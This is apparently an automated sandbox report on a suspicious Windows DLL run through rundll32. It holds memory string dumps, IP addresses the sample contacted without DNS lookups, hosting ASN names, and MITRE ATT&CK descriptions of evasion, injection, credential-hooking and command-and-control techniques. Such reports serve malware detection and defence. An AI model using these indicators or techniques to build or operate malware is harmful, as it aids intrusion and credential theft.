Source: rundll32.exe, 00000006.00000002.2137128012.000000006B56B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000007.00000002.3937735108.000000006B56B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000008.00000002.2200538127.000000006B56B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht

Source: Joe Sandbox View	IP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox View	IP Address: 77.238.229.63 77.238.229.63
Source: Joe Sandbox View	IP Address: 195.2.70.38 195.2.70.38

Source: Joe Sandbox View	ASN Name: VTSL1-ASRU VTSL1-ASRU
Source: Joe Sandbox View	ASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU
Source: Joe Sandbox View	ASN Name: VDSINA-ASRU VDSINA-ASRU
Source: Joe Sandbox View	ASN Name: TELERU-ASRU TELERU-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 195.2.70.38
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.74.28
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.224.56
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.229.63
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123
Source: unknown	TCP traffic detected without corresponding DNS query: 77.238.250.123

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\config

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Windows Analysis Report
file.dll